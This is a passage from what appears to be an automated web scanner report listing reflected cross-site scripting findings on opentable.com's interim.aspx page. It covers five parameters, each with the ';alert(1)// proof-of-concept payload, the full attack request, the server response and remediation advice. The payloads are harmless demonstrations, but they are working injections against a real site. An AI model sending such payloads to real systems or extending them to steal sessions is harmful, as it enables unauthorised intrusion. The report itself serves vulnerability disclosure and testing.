ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&80c13';alert(1)//61446a4a109=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...

4.58. http://www.opentable.com/interim.aspx [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54687'%3balert(1)//b64a7ba4ada was submitted in the p parameter. This input was echoed as 54687';alert(1)//b64a7ba4ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=254687'%3balert(1)//b64a7ba4ada&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:52 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a52&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&rra=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=2&vbefreg=2&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:52 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=254687';alert(1)//b64a7ba4ada&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

4.59. http://www.opentable.com/interim.aspx [restref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dcd9'%3balert(1)//489de1fe41b was submitted in the restref parameter. This input was echoed as 8dcd9';alert(1)//489de1fe41b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=908dcd9'%3balert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a48; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=908dcd9';alert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...

4.60. http://www.opentable.com/interim.aspx [rid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51fe9'%3balert(1)//74d3d82061 was submitted in the rid parameter. This input was echoed as 51fe9';alert(1)//74d3d82061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=9051fe9'%3balert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=9051fe9';alert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...

4.61. http://www.opentable.com/interim.aspx [rtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25d31'%3balert(1)//e91e394761e was submitted in the rtype parameter. This input was echoed as 25d31';alert(1)//e91e394761e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod25d31'%3balert(1)//e91e394761e HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a55&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%2500b8f28%2522%2ba%253db%2b16be442379f&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=153&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod25d31';alert(1)//e91e394761e&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...

4.62. http://www.opentable.com/interim.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c312e'%3balert(1)//0cc46fdb0ea was submitted in the t parameter. This input was echoed as c312e';alert(1)//0cc46fdb0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=singlec312e'%3balert(1)//0cc46fdb0ea&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a49&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
